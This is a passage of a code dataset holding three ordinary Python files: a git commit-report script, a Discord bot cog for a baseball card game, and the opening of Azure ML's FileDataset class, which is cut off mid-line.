+{"seq_id":"513336627","text":"import git\nimport os\nimport datetime\nimport argparse\nfrom re import search\n\ndef validateDate(date_text):\n if (date_text != None):\n try:\n datetime.datetime.strptime(str(date_text), '%Y-%m-%d')\n except Exception as e:\n raise Exception(\"Formato de data inválido, deve ser YYYY-MM-DD\")\n\ndef validateChave(chave):\n if (chave != None):\n chave = str(chave)\n if (chave.startswith(\"C\") != True or len(chave) != 8):\n raise Exception(\"Formato de chave inválido!\")\n\ndef validateTextoBusca(texto):\n if (texto != None):\n texto = str(texto)\n if(len(texto) > 0):\n print(\"\")\n print(\"Texto de Busca a aplicar: \" + texto)\n print(\"\")\n else:\n raise Exception(\"Texto de Busca nao foi fornecido!\")\n\n\ndef montarFiltroLog(args):\n filtro = []\n filtro.append(\"git\")\n filtro.append(\"rev-list\")\n filtro.append(\"--remotes\")\n\n if (args.start_date):\n filtro.append('--after=' + str(args.start_date) + 'T00:00:01')\n if (args.end_date):\n filtro.append('--until=' + args.end_date + 'T23:59:59')\n if (args.key):\n filtro.append('--author=' + args.key)\n\n # if (len(filtro) > 0):\n # filtro.append(\"--pretty=format:%H\")\n\n if (args.texto_busca):\n filtro.append('--grep=' + args.texto_busca)\n\n print(\"\")\n print(\"Comando executado:\")\n print(filtro)\n print(\"\")\n\n return filtro\n\ndef isArgumentoInformado(args):\n return (args.start_date or args.end_date or args.key or args.hash or args.texto_busca)\n\n# Definição dos argumentos de filtro\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--start-date\", \"-sd\", help=\"Data inicial do commit padrão (YYYY-mm-dd)\")\nparser.add_argument(\"--end-date\", \"-ed\", help=\"Data final do commit (YYYY-mm-dd)\")\nparser.add_argument(\"--key\", \"-k\", help=\"Chave C do usuário que realizou o commit\")\nparser.add_argument(\"--hash\", \"-ha\", help=\"Hash do commit a ser analisado\")\nparser.add_argument(\"--texto-busca\", \"-tb\", help=\"Texto a buscar nas mensagens de log dos commits. Exemplo: task 123456.\")\n\n# Leitura dos argumentos\ninputArgs = parser.parse_args()\n\ndirpath = os.getcwd()\nfoldername = os.path.basename(dirpath) + \"/\"\narquivosNovos = []\narquivosModificados = []\n\ng = git.Git(dirpath.replace(\"\\\\\",\"/\"))\n\nif (not isArgumentoInformado(inputArgs)):\n print(\"É necessário informar pelo menos um dos argumentos usados no filtro dos commits. Execute o programa com a opção --help ou -h\")\nelse:\n\n if (inputArgs.hash):\n print(\"Coletando dados dos arquivos criados...\")\n\n loginfoAdicionados = g.execute([\"git\", \"show\", str(inputArgs.hash), \"--name-status\", \"--pretty=oneline\", \"--abbrev-commit\", \"--diff-filter=A\"])\n linhasAdicionados = loginfoAdicionados.splitlines()\n\n if len(linhasAdicionados) > 0:\n arquivosNovos = arquivosNovos + list(\n map(lambda x: foldername + x.replace('A\\t', '') + '#' + str(inputArgs.hash)[0:10], linhasAdicionados))\n\n print(\"Coletando dados dos arquivos modificados...\")\n\n loginfoModificados = g.execute([\"git\", \"show\", str(inputArgs.hash), \"--name-status\", \"--pretty=oneline\", \"--abbrev-commit\", \"--diff-filter=M\"])\n linhasModificados = loginfoModificados.splitlines()\n\n if len(linhasModificados) > 0:\n arquivosModificados = arquivosModificados + list(\n map(lambda x: foldername + x.replace('MM\\t', '').replace('M\\t', '') + '#' + str(inputArgs.hash)[0:10],\n linhasModificados))\n\n arquivosNovosSet = set(arquivosNovos)\n arquivosModificadosSet = set(arquivosModificados)\n\n for novo in arquivosNovos:\n arquivo = novo[:novo.index(\"#\")]\n\n if (arquivo != foldername and arquivo.find(\".\")):\n iguais = set(filter(lambda nome: search(arquivo, nome), arquivosModificados))\n try:\n arquivosModificadosSet = arquivosModificadosSet.difference(iguais)\n except ValueError:\n pass\n\n arquivosNovos = list(arquivosNovosSet)\n arquivosModificados = list(arquivosModificadosSet)\n\n arquivosNovos.sort(key=lambda f: os.path.splitext(f)[1])\n arquivosModificados.sort(key=lambda f: os.path.splitext(f)[1])\n\n print('_______________Arquivos Novos_______________')\n extensaoAnterior = ''\n for x in arquivosNovos:\n extensao = os.path.splitext(x)[1].split('#')[0]\n if extensao != extensaoAnterior:\n extensaoAnterior = extensao;\n print('##Arquivos com extensão ' + extensaoAnterior)\n if (extensao != \"\"):\n print(x.strip(\" \"))\n\n print('_______________Arquivos Modificados_______________')\n extensaoAnterior = ''\n for x in arquivosModificados:\n extensao = os.path.splitext(x)[1].split('#')[0]\n if extensao != extensaoAnterior:\n extensaoAnterior = extensao;\n print('##Arquivos com extensão ' + extensaoAnterior)\n if (extensao != \"\"):\n print(x)\n\n else:\n validateDate(inputArgs.start_date)\n validateDate(inputArgs.end_date)\n validateChave(inputArgs.key)\n validateTextoBusca(inputArgs.texto_busca)\n filtroLog = montarFiltroLog(inputArgs)\n\n try:\n logCommits = g.execute(filtroLog)\n print(\"=\"*40)\n print(\"COMMITS ENCONTRADOS\")\n print(\"=\"*40)\n print(logCommits)\n commitsList = logCommits.splitlines()\n print(\"=\"*40)\n print(\"Total de COMMITS: {}\".format(len(commitsList)))\n print(\"=\"*40)\n\n print(\"Coletando dados dos arquivos criados...\")\n for commit in commitsList:\n loginfoAdicionados = g.execute([\"git\", \"show\", commit,\"--name-status\",\"--pretty=oneline\",\"--abbrev-commit\",\"--diff-filter=A\"])\n linhasAdicionados = loginfoAdicionados.split('\\n')\n\n if len(linhasAdicionados) > 0:\n arquivosNovos = arquivosNovos + list(map(lambda x: foldername + x.replace('A\\t','') + '#' + commit[0:10], linhasAdicionados))\n\n print(\"Coletando dados dos arquivos modificados...\")\n for commit in commitsList:\n loginfoModificados = g.execute([\"git\", \"show\", commit,\"--name-status\",\"--pretty=oneline\",\"--abbrev-commit\",\"--diff-filter=M\"])\n linhasModificados = loginfoModificados.split('\\n')\n\n if len(linhasModificados) > 0:\n arquivosModificados = arquivosModificados + list(map(lambda x: foldername + x.replace('MM\\t','').replace('M\\t','') + '#' + commit[0:10], linhasModificados))\n\n arquivosNovosSet = set(arquivosNovos)\n arquivosModificadosSet = set(arquivosModificados)\n\n for novo in arquivosNovos:\n arquivo = novo[:novo.index(\"#\")]\n\n if (arquivo != foldername and arquivo.find(\".\")):\n iguais = set(filter(lambda nome: search(arquivo, nome), arquivosModificados))\n try:\n arquivosModificadosSet = arquivosModificadosSet.difference(iguais)\n except ValueError:\n pass\n\n arquivosNovos = list(arquivosNovosSet)\n arquivosModificados = list(arquivosModificadosSet)\n\n arquivosNovos.sort(key=lambda f: os.path.splitext(f)[1])\n arquivosModificados.sort(key=lambda f: os.path.splitext(f)[1])\n\n print(\"=\"*40)\n print('_____________Arquivos Novos_____________')\n print(\"=\"*40)\n extensaoAnterior = ''\n for x in arquivosNovos:\n extensao = os.path.splitext(x)[1].split('#')[0]\n if extensao != extensaoAnterior:\n extensaoAnterior = extensao;\n print('##Arquivos com extensão ' + extensaoAnterior)\n if (extensao != \"\"):\n print(x.strip(\" \"))\n\n print(\"=\"*40)\n print('__________Arquivos Modificados__________')\n print(\"=\"*40)\n extensaoAnterior = ''\n for x in arquivosModificados:\n extensao = os.path.splitext(x)[1].split('#')[0]\n if extensao != extensaoAnterior:\n extensaoAnterior = extensao;\n print('##Arquivos com extensão ' + extensaoAnterior)\n if (extensao != \"\"):\n print(x)\n\n except Exception as e:\n print(\"Ocorreu uma exceção durante a execução do programa, provavelmente o filtro informado não retornou dados \" + e)","sub_path":"gerador-relatorio-atividades.py","file_name":"gerador-relatorio-atividades.py","file_ext":"py","file_size_in_byte":8726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"390061827","text":"import discord\r\nimport pygsheets\r\nfrom db_engine import *\r\nfrom discord.ext import commands\r\nfrom difflib import get_close_matches\r\n\r\n\r\nclass Players(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.helpers = self.bot.get_cog('Helpers')\r\n\r\n @commands.command(name='show', aliases=['card', 'player'], help='show ')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def display_player(self, ctx, cardset, *, name):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n yp_query = Player.select(Player.name).where(Player.cardset == cardset)\r\n yearly_players = []\r\n for x in yp_query:\r\n yearly_players.append(x.name.lower())\r\n\r\n try:\r\n great_match = get_close_matches(name.lower(), yearly_players, cutoff=0.75)[0]\r\n this_guy = Player.get((fn.Lower(Player.name) == great_match.lower()), Player.cardset == cardset)\r\n\r\n embed = await self.helpers.get_player_embed(this_guy)\r\n\r\n await self.helpers.send_to_bothole(ctx, None, embed)\r\n\r\n except Exception as e:\r\n await ctx.send(f'I could not find {name.title()}. Is that the right year?')\r\n print(f'**ERROR** (display_player): {e}')\r\n\r\n @commands.command(name='roster', aliases=['team'], help='Show your active roster')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def get_inventory(self, ctx, *abbrev):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n if abbrev:\r\n team = Team.get_or_none(Team.abbrev == abbrev[0].upper())\r\n if not team:\r\n await ctx.send(f'I couldn\\'t find **{abbrev}**. Is that the team\\'s abbreviation?')\r\n return\r\n else:\r\n team = Team.get_by_owner(ctx.author.id)\r\n if not team:\r\n await ctx.send(f'What team are you searching for?')\r\n return\r\n\r\n embed = self.helpers.get_active_roster(team, f'{self.bot.get_user(team.gmid).avatar_url}')\r\n\r\n await self.helpers.send_to_bothole(ctx, content=f'{ctx.author.mention}', embed=embed)\r\n\r\n @commands.command(name='in', help='Get Paper Dynasty Players role')\r\n async def give_role(self, ctx, *args):\r\n await ctx.author.add_roles(discord.utils.get(ctx.guild.roles, name='Paper Dynasty Players'))\r\n await ctx.send('I got u, boo. ;)')\r\n\r\n @commands.command(name='out', help='Remove Paper Dynasty Players role')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def take_role(self, ctx, *args):\r\n await ctx.author.remove_roles(discord.utils.get(ctx.guild.roles, name='Paper Dynasty Players'))\r\n await ctx.send('Oh no! I\\'m so sad to see you go! What are we going to do without you?')\r\n\r\n @commands.command(name='teams', help='List all teams')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def list_teams(self, ctx, *args):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n all_teams = Team.select()\r\n\r\n # Collect rarity objects\r\n try:\r\n rar_mvp = Rarity.get(Rarity.name == 'MVP')\r\n rar_als = Rarity.get(Rarity.name == 'All-Star')\r\n rar_sta = Rarity.get(Rarity.name == 'Starter')\r\n rar_res = Rarity.get(Rarity.name == 'Reserve')\r\n rar_rpl = Rarity.get(Rarity.name == 'Replacement')\r\n except Exception as e:\r\n print(f'**Error**: (players inv getrars) - {e}')\r\n return\r\n\r\n embed = discord.Embed(title='All Teams', color=0xdeeadd)\r\n\r\n # Build embed\r\n for x in all_teams:\r\n mvps, alss, stas, ress, reps = 0, 0, 0, 0, 0\r\n roster = Roster.get_cards(team=x)\r\n\r\n for p in roster:\r\n if p.player.rarity == rar_mvp:\r\n mvps += 1\r\n elif p.player.rarity == rar_als:\r\n alss += 1\r\n elif p.player.rarity == rar_sta:\r\n stas += 1\r\n elif p.player.rarity == rar_res:\r\n ress += 1\r\n else:\r\n reps += 1\r\n\r\n un_packs = Pack.select(Pack.id).where((Pack.team == x) & (Pack.card1.is_null())).count()\r\n op_packs = Pack.select(Pack.id).where((Pack.team == x) & (Pack.card1.is_null(False))).count()\r\n\r\n embed.add_field(\r\n name=f'{x.lname}',\r\n value=f'GM: {x.gmname}\\n'\r\n f'Packs (Unopen): {op_packs + un_packs} ({un_packs})\\n\\n'\r\n f'MVPs: {mvps}\\n'\r\n f'All-Stars: {alss}\\n'\r\n f'Starters: {stas}\\n'\r\n f'Reserves: {ress}\\n'\r\n f'Replacements: {reps}\\n------\\n'\r\n f'Collection Value: {self.helpers.get_team_value(x)}')\r\n\r\n await self.helpers.send_to_bothole(ctx, content=f'{ctx.author.mention}', embed=embed)\r\n\r\n @commands.command(name='result', help='Log your game results')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def result(self, ctx, awayabbrev: str, awayscore: int, homeabbrev: str, homescore: int):\r\n # Validate teams listed\r\n try:\r\n awayteam = Team.get(Team.abbrev == awayabbrev.upper())\r\n hometeam = Team.get(Team.abbrev == homeabbrev.upper())\r\n print(f'Final: {awayabbrev} {awayscore} - {homescore} {homeabbrev}')\r\n except Exception as e:\r\n error = f'**ERROR:** {type(e).__name__} - {e}'\r\n print(error)\r\n await ctx.message.add_reaction('❌')\r\n await ctx.send(f'Hey, {ctx.author.mention}, I couldn\\'t find the teams you mentioned. You put '\r\n f'**{awayabbrev}** as the away team and **{homeabbrev}** as the home team.')\r\n return\r\n\r\n earnings = {'away': 0, 'home': 0}\r\n earnings_away = []\r\n earnings_home = []\r\n\r\n # Check author then log result\r\n if ctx.author.id in [awayteam.gmid, awayteam.gmid2, hometeam.gmid, hometeam.gmid2] \\\r\n or ctx.author.id == self.bot.owner_id:\r\n this_result = Result(week=Current.get_by_id(1).week,\r\n awayteam=awayteam, hometeam=hometeam,\r\n awayscore=awayscore, homescore=homescore,\r\n season=Current.get_by_id(1).season)\r\n this_result.save()\r\n await self.helpers.pause_then_type(ctx, f'Just logged {awayteam.abbrev.upper()} {awayscore} - '\r\n f'{homescore} {hometeam.abbrev.upper()}')\r\n await ctx.message.add_reaction('✅')\r\n\r\n # Credit pack for win\r\n if awayscore > homescore:\r\n earnings['away'] += 1\r\n earnings_away.append('- 1 pack for the win\\n')\r\n else:\r\n earnings['home'] += 1\r\n earnings_home.append('- 1 pack for the win\\n')\r\n\r\n away_team_value = self.helpers.get_team_value(awayteam)\r\n home_team_value = self.helpers.get_team_value(hometeam)\r\n delta = away_team_value - home_team_value\r\n if delta < 0:\r\n increments = divmod(-delta, self.helpers.TEAM_DELTA_CONSTANT)\r\n print(f'increments: {increments}')\r\n packs = min(increments[0], 5)\r\n if packs > 0:\r\n earnings['away'] += packs\r\n earnings_away.append(f'- {packs} pack{\"s\" if packs > 1 else \"\"} for underdog\\n')\r\n else:\r\n increments = divmod(delta, self.helpers.TEAM_DELTA_CONSTANT)\r\n print(f'increments: {increments}')\r\n packs = min(increments[0], 5)\r\n if packs > 0:\r\n earnings['home'] += packs\r\n earnings_home.append(f'- {packs} pack{\"s\" if packs > 1 else \"\"} for underdog\\n')\r\n\r\n print(f'earn away: {earnings[\"away\"]} / earn home: {earnings[\"home\"]}')\r\n away_packs_remaining = Current.get_by_id(1).packlimit - awayteam.weeklypacks\r\n home_packs_remaining = Current.get_by_id(1).packlimit - hometeam.weeklypacks\r\n away_final_earnings = away_packs_remaining if away_packs_remaining >= earnings[\"away\"] else earnings[\"away\"]\r\n home_final_earnings = home_packs_remaining if home_packs_remaining >= earnings[\"home\"] else earnings[\"home\"]\r\n print(f'away_final_earnings: {away_final_earnings}')\r\n print(f'home_final_earnings: {home_final_earnings}')\r\n\r\n # TODO: Seems to be giving underdog the square of their earnings\r\n economy = self.bot.get_cog('Economy')\r\n if earnings[\"away\"] > 0:\r\n print(f'away_final_earnings: {away_final_earnings}')\r\n economy.give_pack(awayteam, away_final_earnings)\r\n if earnings[\"home\"] > 0:\r\n print(f'home_final_earnings: {home_final_earnings}')\r\n economy.give_pack(hometeam, home_final_earnings)\r\n\r\n embed = discord.Embed(title=f'{awayteam.sname} {awayscore} - {homescore} {hometeam.sname}',\r\n description='Score Report / Post Game Earnings')\r\n embed.add_field(name=awayteam.lname,\r\n value=f'Team Value: {away_team_value}\\n\\n'\r\n f'**Earn: {earnings[\"away\"]} pack{\"s\" if earnings[\"away\"] != 1 else \"\"}**'\r\n f' (limit {away_final_earnings})\\n'\r\n f'{\"Summary:\" if len(earnings_away) > 0 else \"\"}\\n'\r\n f'{earnings_away[0] if len(earnings_away) > 0 else \"\"}'\r\n f'{earnings_away[1] if len(earnings_away) > 1 else \"\"}',\r\n inline=False)\r\n embed.add_field(name=hometeam.lname,\r\n value=f'Team Value: {home_team_value}\\n\\n'\r\n f'**Earn: {earnings[\"home\"]} pack{\"s\" if earnings[\"home\"] != 1 else \"\"}**'\r\n f' (limit {home_final_earnings})\\n'\r\n f'{\"Summary:\" if len(earnings_home) > 0 else \"\"}\\n'\r\n f'{earnings_home[0] if len(earnings_home) > 0 else \"\"}'\r\n f'{earnings_home[1] if len(earnings_home) > 1 else \"\"}',\r\n inline=False)\r\n await self.helpers.send_to_news(ctx, None, embed)\r\n\r\n @commands.command(name='sheet', aliases=['google'], help='Link to your roster sheet')\r\n @commands.has_any_role('Paper Dynasty Players')\r\n async def get_roster_command(self, ctx):\r\n if ctx.message.channel.name != 'pd-bot-hole':\r\n await ctx.send('Slide on down to my bot-hole for running commands.')\r\n await ctx.message.add_reaction('❌')\r\n return\r\n\r\n team = Team.get_by_owner(ctx.author.id)\r\n if not team:\r\n await ctx.send(f'Do you have a team? I don\\'t see your name here...')\r\n return\r\n\r\n await ctx.send(f'{ctx.author.mention}\\n{team.lname} Roster Sheet: <{self.helpers.get_roster_sheet(team)}>')\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Players(bot))\r\n","sub_path":"cogs/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":11527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"97835448","text":"# ---------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# ---------------------------------------------------------\n\n\"\"\"Contains functionality for referencing single or multiple files in datastores or public URLs.\n\nFor more information, see the article [Add & register\ndatasets](https://docs.microsoft.com/azure/machine-learning/how-to-create-register-datasets).\nTo get started working with a file dataset, see https://aka.ms/filedataset-samplenotebook.\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport tempfile\nimport uuid\n\nfrom azureml._common.exceptions import AzureMLException\nfrom azureml._tracing import get_tracer\nfrom azureml.data.abstract_dataset import AbstractDataset, _get_path_from_step\nfrom azureml.data._dataprep_helper import dataprep, dataprep_fuse, get_dataflow_for_execution\nfrom azureml.data._loggerfactory import track, _LoggerFactory\nfrom azureml.data.constants import _PUBLIC_API\nfrom azureml.data.dataset_error_handling import _try_execute, _construct_message_and_check_exception_type, \\\n _dataprep_error_handler\nfrom azureml.exceptions import UserErrorException\n\n\n_logger = None\n_tracer = None # type: Optional[AmlTracer]\n\n\ndef _get_logger():\n global _logger\n if _logger is None:\n _logger = _LoggerFactory.get_logger(__name__)\n return _logger\n\n\ndef _get_tracer():\n global _tracer\n if _tracer is None:\n _tracer = get_tracer(__name__)\n return _tracer\n\n\nclass FileDataset(AbstractDataset):\n \"\"\"Represents a collection of file references in datastores or public URLs to use in Azure Machine Learning.\n\n A FileDataset defines a series of lazily-evaluated, immutable operations to load data from the\n data source into file streams. Data is not loaded from the source until FileDataset is asked to deliver data.\n\n A FileDataset is created using the :func:`azureml.data.dataset_factory.FileDatasetFactory.from_files` method\n of the FileDatasetFactory class.\n\n For more information, see the article `Add & register\n datasets `_.\n To get started working with a file dataset, see https://aka.ms/filedataset-samplenotebook.\n\n .. remarks::\n\n FileDataset can be used as input of an experiment run. It can also be registered to workspace\n with a specified name and be retrieved by that name later.\n\n FileDataset can be subsetted by invoking different subsetting methods available on this class.\n The result of subsetting is always a new FileDataset.\n\n The actual data loading happens when FileDataset is asked to deliver the data into another\n storage mechanism (e.g. files downloaded or mounted to local path).\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize the FileDataset object.\n\n This constructor is not supposed to be invoked directly. Dataset is intended to be created using\n :class:`azureml.data.dataset_factory.FileDatasetFactory` class.\n \"\"\"\n super().__init__()\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def to_path(self):\n \"\"\"Get a list of file paths for each file stream defined by the dataset.\n\n .. remarks::\n The file paths are relative paths for local files when the file streams are downloaded or mounted.\n\n A common prefix will be removed from the file paths based on how data source was\n specified to create the dataset. For example:\n\n .. code-block:: python\n\n datastore = Datastore.get(workspace, 'workspaceblobstore')\n dataset = Dataset.File.from_files((datastore, 'animals/dog/year-*/*.jpg'))\n print(dataset.to_path())\n\n # ['year-2018/1.jpg'\n # 'year-2018/2.jpg'\n # 'year-2019/1.jpg']\n\n dataset = Dataset.File.from_files('https://dprepdata.blob.core.windows.net/demo/green-small/*.csv')\n\n print(dataset.to_path())\n # ['/green_tripdata_2013-08.csv']\n\n :return: Returns an array of file paths.\n :rtype: builtin.list(str)\n \"\"\"\n return self._to_path(activity='to_path')\n\n def _to_path(self, activity):\n dataflow, portable_path = _add_portable_path_column(self._dataflow)\n dataflow = get_dataflow_for_execution(dataflow, activity, 'FileDataset')\n records = dataflow._to_pyrecords()\n return [r[portable_path] for r in records]\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def download(self, target_path=None, overwrite=False):\n \"\"\"Download file streams defined by the dataset as local files.\n\n .. remarks::\n\n If target_path starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the current working directory.\n\n :param target_path: The local directory to download the files to. If None, the data will be downloaded\n into a temporary directory.\n :type target_path: str\n :param overwrite: Indicates whether to overwrite existing files. The default is False. Existing files will\n be overwritten if overwrite is set to True; otherwise an exception will be raised.\n :type overwrite: bool\n :return: Returns an array of file paths for each file downloaded.\n :rtype: builtin.list(str)\n \"\"\"\n with _get_tracer().start_as_current_span('download', user_facing_name='Dataset.download') as span:\n target_path = _ensure_path(target_path)\n download_list = [os.path.abspath(os.path.join(target_path, '.' + p))\n for p in self._to_path(activity='download.to_path')]\n\n if self.id:\n span.set_user_facing_attribute('dataset_id', self.id)\n span.set_user_facing_attribute('target_path', target_path)\n\n if not overwrite:\n for p in download_list:\n # encode p to avoid UnicodeEncodeError from os.path.exists\n if os.path.exists(_encode_if_needed(p)):\n raise UserErrorException('File \"{}\" already exists. Set overwrite=True to overwrite it.'\n .format(p))\n base_path = dataprep().api.datasources.LocalFileOutput(target_path)\n\n dataflow, portable_path = _add_portable_path_column(self._dataflow)\n dataflow = dataflow.write_streams(\n streams_column='Path',\n base_path=base_path,\n file_names_column=portable_path)\n\n dataflow = get_dataflow_for_execution(dataflow, 'download', 'FileDataset')\n _try_execute(dataflow.run_local,\n 'download',\n None if self.id is None else {'id': self.id, 'name': self.name, 'version': self.version})\n return download_list\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def mount(self, mount_point=None, **kwargs):\n \"\"\"Create a context manager for mounting file streams defined by the dataset as local files.\n\n .. remarks::\n\n A context manager will be returned to manage the lifecycle of the mount. To mount, you will need to\n enter the context manager and to unmount, exit from the context manager.\n\n Mount is only supported on Unix or Unix-like operating systems and libfuse must be present. If you\n are running inside a docker container, the docker container must be started with the `--privileged` flag\n or started with `--cap-add SYS_ADMIN --device /dev/fuse`.\n\n .. code-block:: python\n\n datastore = Datastore.get(workspace, 'workspaceblobstore')\n dataset = Dataset.File.from_files((datastore, 'animals/dog/year-*/*.jpg'))\n\n with dataset.mount() as mount_context:\n # list top level mounted files and folders in the dataset\n os.listdir(mount_context.mount_point)\n\n # You can also use the start and stop methods\n mount_context = dataset.mount()\n mount_context.start() # this will mount the file streams\n mount_context.stop() # this will unmount the file streams\n\n If target_path starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the current working directory.\n\n :param mount_point: The local directory to mount the files to. If None, the data will be mounted into a\n temporary directory, which you can find by calling the `MountContext.mount_point` instance method.\n :type mount_point: str\n :return: Returns a context manager for managing the lifecycle of the mount.\n :rtype: azureml.dataprep.fuse.daemon.MountContext\n \"\"\"\n try:\n mount = dataprep_fuse().mount\n except ValueError as e:\n if 'Invalid mount arguments' in str(e):\n raise UserErrorException(e)\n raise AzureMLException(\"Execution failed unexpectedly due to: {}\".format(str(e)))\n except OSError as e:\n raise UserErrorException('Mount is only supported on Unix or Unix-like operating systems and the '\n 'FUSE library must be present. For more information, please refer to the '\n 'remarks section of FileDataset.mount\\'s documentation. Execution failed'\n 'unexpectedly due to {}'.format(e.__class__.__name__))\n except Exception as e:\n raise AzureMLException(\"Mount failed unexpectedly due to: {}\".format(str(e)))\n\n mount_point = _ensure_path(mount_point)\n if os.path.ismount(mount_point):\n raise UserErrorException('\"{0}\" is already mounted. Run `sudo umount \"{0}\"` to unmount it.'\n .format(mount_point))\n\n if not os.path.exists(mount_point):\n os.makedirs(mount_point)\n\n invocation_id = str(uuid.uuid4())\n dataflow = get_dataflow_for_execution(self._dataflow, 'mount.find_prefix', 'FileDataset',\n invocation_id=invocation_id)\n base_path = _find_path_prefix(dataflow)\n dataflow = get_dataflow_for_execution(self._dataflow, 'mount', 'FileDataset',\n invocation_id=invocation_id)\n mount_options = kwargs.get('mount_options', None)\n skip_validate = kwargs.get('skip_validate', False)\n\n if not skip_validate:\n try:\n is_invalid = dataflow.has_invalid_source(return_validation_error=True)\n if is_invalid is not False: # This means that the source is invalid\n raise UserErrorException(\"Cannot mount Dataset(id='{}', name='{}', version={}). \"\n \"Source of the dataset is either not \"\n \"accessible or does not contain any data. \"\n \"Error Message: {}\".format(self.id, self.name, self.version, is_invalid))\n except TypeError:\n # This catch is for backwards compatibility. There are valid version combinations of dataprep\n # and core where dataflow.has_invalid_source will not have the return_validation_error parameter,\n # which the above call will throw a TypeError.\n if dataflow.has_invalid_source(): # This means that the source is invalid\n raise UserErrorException(\"Cannot mount dataset. Source of the dataset is either not \"\n \"accessible or does not contain any data. \")\n except AttributeError:\n # This catch is for backwards compatibility. There are valid version combinations of dataprep\n # and core where Dataflow will not have the has_invalid_source method.\n pass\n except UserErrorException:\n raise\n except AzureMLException:\n raise\n except Exception as e:\n dataset_info = None if self.id is None else {'id': self.id, 'name': self.name, 'version': self.version}\n message, is_dprep_exception = _construct_message_and_check_exception_type(e, dataset_info, \"mount\")\n _logger.error(message)\n _dataprep_error_handler(e, message, is_dprep_exception)\n\n return mount(\n dataflow=dataflow,\n files_column='Path',\n mount_point=mount_point,\n base_path=base_path,\n options=mount_options,\n foreground=False,\n invocation_id=invocation_id)\n\n def as_mount(self, path_on_compute=None):\n \"\"\"Create a DatasetConsumptionConfig with the mode set to mount.\n\n In the submitted run, files in the datasets will be mounted to local path on the compute target.\n The mount point can be retrieved from argument values and the input_datasets field of the run context.\n We will automatically generate an input name. If you would like specify a custom input name, please call\n the as_named_input method.\n\n .. code-block:: python\n\n # Given a run submitted with dataset input like this:\n dataset_input = dataset.as_mount()\n experiment.submit(ScriptRunConfig(source_directory, arguments=[dataset_input]))\n\n\n # Following are sample codes running in context of the submitted run:\n\n # The mount point can be retrieved from argument values\n import sys\n mount_point = sys.argv[1]\n\n # The mount point can also be retrieved from input_datasets of the run context.\n from azureml.core import Run\n mount_point = Run.get_context().input_datasets['input_1']\n\n .. remarks::\n\n When the dataset is created from path of a single file, the mount point will be path of the single mounted\n file. Otherwise, the mount point will be path of the enclosing folder for all the mounted files.\n\n If path_on_compute starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the working directory. If you have\n specified an absolute path, please make sure that the job has permission to write to that directory.\n\n :param path_on_compute: The target path on the compute to make the data available at.\n :type path_on_compute: str\n \"\"\"\n return (self\n .as_named_input(name=None)\n .as_mount(path_on_compute=path_on_compute))\n\n def as_download(self, path_on_compute=None):\n \"\"\"Create a DatasetConsumptionConfig with the mode set to download.\n\n In the submitted run, files in the dataset will be downloaded to local path on the compute target.\n The download location can be retrieved from argument values and the input_datasets field of the run context.\n We will automatically generate an input name. If you would like specify a custom input name, please call\n the as_named_input method.\n\n .. code-block:: python\n\n # Given a run submitted with dataset input like this:\n dataset_input = dataset.as_download()\n experiment.submit(ScriptRunConfig(source_directory, arguments=[dataset_input]))\n\n\n # Following are sample codes running in context of the submitted run:\n\n # The download location can be retrieved from argument values\n import sys\n download_location = sys.argv[1]\n\n # The download location can also be retrieved from input_datasets of the run context.\n from azureml.core import Run\n download_location = Run.get_context().input_datasets['input_1']\n\n .. remarks::\n\n When the dataset is created from path of a single file, the download location will be path of the single\n downloaded file. Otherwise, the download location will be path of the enclosing folder for all the\n downloaded files.\n\n If path_on_compute starts with a /, then it will be treated as an absolute path. If it doesn't start\n with a /, then it will be treated as a relative path relative to the working directory. If you have\n specified an absolute path, please make sure that the job has permission to write to that directory.\n\n :param path_on_compute: The target path on the compute to make the data available at.\n :type path_on_compute: str\n \"\"\"\n return (self\n .as_named_input(name=None)\n .as_download(path_on_compute=path_on_compute))\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def skip(self, count):\n \"\"\"Skip file streams from the top of the dataset by the specified count.\n\n :param count: The number of file streams to skip.\n :type count: int\n :return: Returns a new FileDataset object representing a dataset with file streams skipped.\n :rtype: azureml.data.FileDataset\n \"\"\"\n return FileDataset._create(self._dataflow.skip(count), self._properties, telemetry_info=self._telemetry_info)\n\n @track(_get_logger, custom_dimensions={'app_name': 'FileDataset'}, activity_type=_PUBLIC_API)\n def take(self, count):\n \"\"\"Take a sample of file streams from top of the dataset by the specified count.\n\n :param count: The number of file streams to take.\n :type count: int\n :return: Returns a new FileDataset object representing the sampled dataset.\n :rtype: azureml.data.FileDataset\n \"\"\"\n return FileDataset._create(self._dataflow.take(count), self._properties, telemetry_info=self._telemetry_info)\n\n @track(_get_logger, custom_dimensions={'app_name': 